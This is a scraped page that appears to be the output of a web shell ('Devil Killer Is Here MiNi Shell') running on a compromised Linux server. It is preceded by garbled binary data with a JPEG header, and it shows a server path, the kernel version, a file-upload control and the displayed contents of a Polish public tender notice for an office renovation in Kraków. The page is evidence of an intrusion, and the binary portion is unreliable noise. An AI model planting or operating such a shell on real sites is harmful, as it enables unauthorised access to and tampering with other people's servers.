JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210629/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210629/0009755901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00097559 z dnia 2021-06-29</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont generalny części budynku biurowego zlokalizowanego na działce nr 449/2 obr. 5 Śródmieście przy ul. K. Kordylewskiego 11 w Krakowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Małopolska Agencja Rozwoju Regionalnego S.A.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 350239017</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kordylewskiego 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-542</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@marr.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.marr.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> rozwój regionalny </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont generalny części budynku biurowego zlokalizowanego na działce nr 449/2 obr. 5 Śródmieście przy ul. K. Kordylewskiego 11 w Krakowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-04a5458b-d8a7-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00097559</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://marr.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://marr.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony<br/>postępowania oświadczeń, wniosków, zawiadomień oraz informacji elektronicznie za pośrednictwem<br/>Platformy znajdującej się pod adresem:<br/>https://marr.ezamawiajacy.pl w zakładce „Korespondencja”. Zamawiający nie przewiduje innego<br/>sposobu komunikowania niż elektroniczny.2.Za datę wpływu oświadczeń, wniosków, zawiadomień oraz<br/>informacji przyjmuje się datę dostarczenia wiadomości na adres e-mail Zamawiającego lub ich<br/>złożenia/wysłania na Platformie.3.Ogólne zasady korzystania z Platformy: a) zgłoszenie do<br/>postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie MARR S.A.;<br/>https://marr.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl.b) Wykonawca po wybraniu opcji<br/>„Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie<br/>zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca<br/>zakłada konto; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z<br/>obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. c)Rejestracja Wykonawcy trwa<br/>maksymalnie do 2 dni roboczych. d)Po założeniu konta Wykonawca ma możliwość złożenia Oferty w<br/>postępowaniu. 4. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ.<br/>Wniosek należy przesłać za pośrednictwem Platformy Zakupowej przez opcję „Zadaj pytanie” lub przy<br/>użyciu zakładki „Korespondencja”. W celu zadania pytania, Wykonawca klika lewym przyciskiem<br/>myszy klawisz ZADAJ PYTANIE. Otwiera się okno, w którym należy uzupełnić dane Wykonawcy, temat<br/>i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym kodem weryfikującym z<br/>obrazka Wykonawca klika klawisz POTWIERDŹ, wykonawca uzyskuje potwierdzenie wysłania pytania<br/>poprzez komunikat systemowy "Pytanie wysłane". Zamawiający jest obowiązany udzielić wyjaśnień<br/>niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert pod warunkiem że<br/>wniosek o wyjaśnienie treści SWZ wpłynął do zamawiającego nie później niż na 4 dni przed upływem<br/>terminu składania ofert. 5.Treść pytań (bez ujawniania źródła zapytania) wraz z wyjaśnieniami bądź informacje o dokonaniu modyfikacji SWZ, Zamawiający przekaże Wykonawcom za pośrednictwem<br/>Platformy Zakupowej. 6.W przypadku wątpliwości związanych z zasadami korzystania z Platformy<br/>Wykonawca winien skontaktować się z dostawcą Platforma zakupowa MARR S.A. tel. +48 22 257 22<br/>23 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl.<br/>7.Dopuszczalny format podpisu elektronicznego: a) dokumenty w formacie „pdf" zaleca się podpisywaćformatem PAdES,b) dopuszcza się podpisanie dokumentów w formacie innym niż „pdf", wtedy będzie<br/>wymagany oddzielny plik z podpisem. 8.Niezbędne wymagania sprzętowo- aplikacyjne umożliwiające<br/>pracę na Platformie Zakupowej: a)Stały dostęp do sieci Internet o gwarantowanej przepustowości nie<br/>mniejszej niż 512 kb/s; b)Komputer klasy PC lub MAC, o konfiguracji: pamięć min 2GB Ram, procesor<br/>Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze<br/>wersje; c)Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w<br/>najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;d)Włączona obsługa<br/>JavaScript; e)Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf. 9.<br/>Dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt,<br/>ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg,<br/>mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt,<br/>TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.10.Plik załączony przez Wykonawcę na Platformie<br/>Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://marr.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych<br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję,<br/>że:<br/>􀀀 administratorem Pani/Pana danych osobowych jest Małopolska Agencja Rozwoju Regionalnego S.A.<br/>z siedzibą w Krakowie (31-542) przy ul. Kordylewskiego 11, www.marr.pl, e-mail: biuro@marr.pl<br/>􀀀 administrator wyznaczył inspektora ochrony danych, z którym można się kontaktować w sprawach<br/>dotyczących Pani/Pana danych osobowych wysyłając email na adres: iod@marr.pl lub pisemnie na<br/>adres siedziby administratora jak wyżej;<br/>􀀀 Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. „c” i lit. „f” RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego pn.: „Remont generalny części<br/>budynku biurowego zlokalizowanego na działce nr 449/2 obr. 5 Śródmieście przy ul. K. Kordylewskiego<br/>11 w Krakowie” (ZP/05/21/BS) prowadzonym w trybie podstawowym, o jakim stanowi art. 275 pkt 1<br/>ustawy;<br/>􀀀 odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. –<br/>Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 ze zm.), dalej „ustawa Pzp”;<br/>􀀀 Pani/Pana dane osobowe będą przez okres niezbędny do realizacji celów przetwarzania, lecz nie<br/>krócej niż okres wskazany w przepisach o archiwizacji tj. przez okres 10 pełnych lat od dnia<br/>zakończenia postępowania o udzielenie ww. zamówienia; <br/>obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp (podanie danych dobrowolne, ale konieczne do udziału w postępowaniu);<br/>􀀀 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>􀀀 posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **; − na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>􀀀 nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Odbiorcą Pani/Pana danych osobowych będą upoważnieni pracownicy Małopolskiej Agencji Rozwoju<br/>Regionalnego S.A. oraz spółka Otwarty Rynek Elektroniczny S.A. siedzibą w Warszawie (02-672) przy<br/>ul. Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego,<br/>prowadzonego przez Sąd Rejonowy dla m.st. Warszawy w Warszawie XIII Wydział Gospodarczy<br/>Krajowego Rejestru Sądowego pod numerem KRS: 0000041441, REGON: 017282436, NIP: 526-25-<br/>35-153, jako właściciel Platformy Zakupowej, na której MARR SA prowadzi postępowania o udzielenie<br/>zamówienia publicznego, działającą pod adresem: https://marr.ezamawiajacy.pl.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/11/21/BS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest przebudowa pomieszczeń biurowych na parterze oraz na<br/>piętrach od I-IV w budynku przy ul. Kordylewskiego 11 w Krakowie, w zakresie m.in. rozbiórek<br/>ścian działowych, budowy nowych ścian, aranżacji pomieszczeń, wykonania nowych posadzek,<br/>malowania, wykonania instalacji wentylacji, klimatyzacji, wodociągowej, kanalizacyjnej,<br/>centralnego ogrzewania, instalacji niskoprądowych i CCTV wraz z wymianą okien. Specyfikacja<br/>Techniczna Wykonania i Odbioru Robót Budowlanych znajduje się w załączniku nr 3 do<br/>specyfikacji.<br/>2. Przedmiar w podziale na kondygnacje (parter wraz z piwnicą oraz piętra - od I-szego do IVego<br/>- znajduje się w załączniku nr 4 do specyfikacji.<br/>3. Dokumentacja projektowa stanowi załącznik nr 5 do specyfikacji.<br/>4. Zamówienie zostanie zrealizowane w dwóch następujących etapach:<br/>a) etap I – III i IV piętro budynku;<br/>b) etap II – pozostały zakres zamówienia<br/>5. Zamawiający informuje, że wszystkie prace generujące hałas lub zapylenie, stanowiące<br/>utrudnienie dla funkcjonowania nieremontowanych kondygnacji budynku mogą być realizowane<br/>od poniedziałku do piątku od godziny 16:00 do godziny 5:00 następnego dnia, z wyłączeniem<br/>soboty i niedzieli w które to dni roboty mogą trwać całą dobę – do poniedziałku do godziny 5:00.<br/>6. Ponadto Zamawiający wymaga, aby podczas prowadzenia wszystkich robót budowlanych<br/>Wykonawca zapewnił nieograniczony dostęp do budynku. Podczas remontu na części kondygnacji nieobjętych robotami budowlanymi będą pracować pracownicy Zamawiającego, a<br/>na wyższych kondygnacjach (powyżej IV piętra) swoją siedzibę m.in. ma sąd oraz<br/>architektoniczna pracownia projektowa, które również muszą mieć zapewnioną ciągłość<br/>funkcjonowania.<br/>7. W okresie trwania gwarancji i rękojmi Wykonawca zobowiązany jest do organizowania<br/>przeglądów okresowych ( w tym przeglądów ppoż zamontowanych urządzeń) w terminach 12,<br/>24, i 36 miesięcy od dnia odbioru końcowego. Wykonanie przeglądu zostanie potwierdzone<br/>Protokołem z przeglądu okresowego.<br/>8. W okresie trwania gwarancji Wykonawca jest zobowiązany wykonywać wszystkie przeglądy<br/>systemów wymienione w przepisach prawa, kartach gwarancyjnych, wskazówkach prawidłowej<br/>eksploatacji, dokumentacji techniczno-ruchowej, czy innych dokumentach dostarczonych przez<br/>producenta zamontowanych urządzeń wraz z wymianą materiałów eksploatacyjnych, np.: należy<br/>wykonać przegląd instalacji wentylacji wraz z wymianą filtrów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45262700-8 - Przebudowa budynków</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45312000-7 - Instalowanie systemów alarmowych i anten</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">217 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze najkorzystniejszą ofertę na wykonanie<br/>zamówienia w oparciu o liczbę punktów uzyskanych przez każdego z Wykonawców w kryterium Ceny.<br/>Zamawiający udzieli zamówienia wykonawcy, którego oferta uzyska największą ilość punktów w<br/>ostatecznej ocenie punktowej oraz wypełni dodatkowe wymagania określone w treści specyfikacji,<br/>dotyczące miedzy innymi wymagania wskazanego w art. 128 Pzp (wykonawca ten przedłoży na<br/>wezwanie zamawiającego dokumenty/oświadczenia potwierdzające spełnienie warunków udziału w<br/>postępowaniu i brak podstaw do wykluczenia z postępowania- punkt VIII specyfikacji).<br/>2. Jeżeli nie można dokonać wyboru najkorzystniejszej oferty ze względu na to że zostały złożone<br/>oferty o takiej samej cenie, Zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w<br/>terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>3. Wykonawcy składający oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w<br/>uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek zdolności technicznej lub zawodowej – Wykonawca spełni warunek, jeśli wykaże, że:<br/>1) posiada doświadczenie zawodowe w wykonywaniu robót budowlanych odpowiadających<br/>swoim rodzajem robocie budowlanej stanowiącej przedmiot zamówienia, tj.: że w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy – wykonał w tym okresie, minimum 2 (dwie) roboty budowlane polegające na<br/>budowie, przebudowie, rozbudowie, remoncie budynku użyteczności publicznej o łącznej<br/>powierzchni użytkowej nie mniejszej niż 2000,0 m2 i wartości udzielonego zamówienia nie<br/>mniejszej niż 4 000 000,00 zł brutto, z wyłączeniem budynków architektury drewnianej.<br/>Zgodnie z par. 3 punkt 6) Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 roku w<br/>sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U.<br/>2002.75.690 ze zm.) przez budynki użyteczności publicznej należy rozumieć budynek<br/>przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu<br/>religijnego, oświaty, szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej, społecznej<br/>lub socjalnej, obsługi bankowej, handlu, gastronomii, usług, w tym usług pocztowych lub<br/>telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym,<br/>lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek przeznaczony do<br/>wykonywania podobnych funkcji. Jednocześnie zastrzeżono, że za budynek użyteczności<br/>publicznej uznaje się także budynek biurowy lub socjalny.<br/>Robota budowlana może zostać wykazana, gdy jej realizacja została zakończona i odebrana<br/>przez Inwestora zgodnie z obowiązującą w dacie odbioru umową i przepisami powszechnie<br/>obowiązującego prawa. W przypadku gdy jakakolwiek wartość dotycząca powyższego warunku wyrażona będzie w<br/>walucie obcej, Zamawiający przeliczy tę wartość w oparciu o średni kurs walut Narodowego<br/>Banku Polskiego (dalej: NBP) dla danej waluty z dnia, w którym nastąpiła publikacja<br/>przedmiotowego postępowania. Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP,<br/>Zamawiający przyjmie średni kurs z ostatniego dnia przed dniem publikacji.<br/>W przypadku oferty składanej wspólnie (konsorcjum) warunek udziału w postępowaniu w zakresie zdolności zawodowej powinien spełnić co najmniej jeden z wykonawców składających<br/>ofertę wspólną.<br/>2) Wykonawca zapewni, że przy realizacji zamówienia dysponować będzie następującymi<br/>osobami, które będą realizować roboty budowlane.<br/>a. Kierownik Budowy - posiadającym doświadczenie w pełnieniu funkcji kierownika budowy,<br/>przebudowy, rozbudowy, remoncie w pełnym okresie budowy, tj. od daty przekazania terenu<br/>budowy wykonawcy robót do dnia zakończenia czynności odbioru końcowego robót, 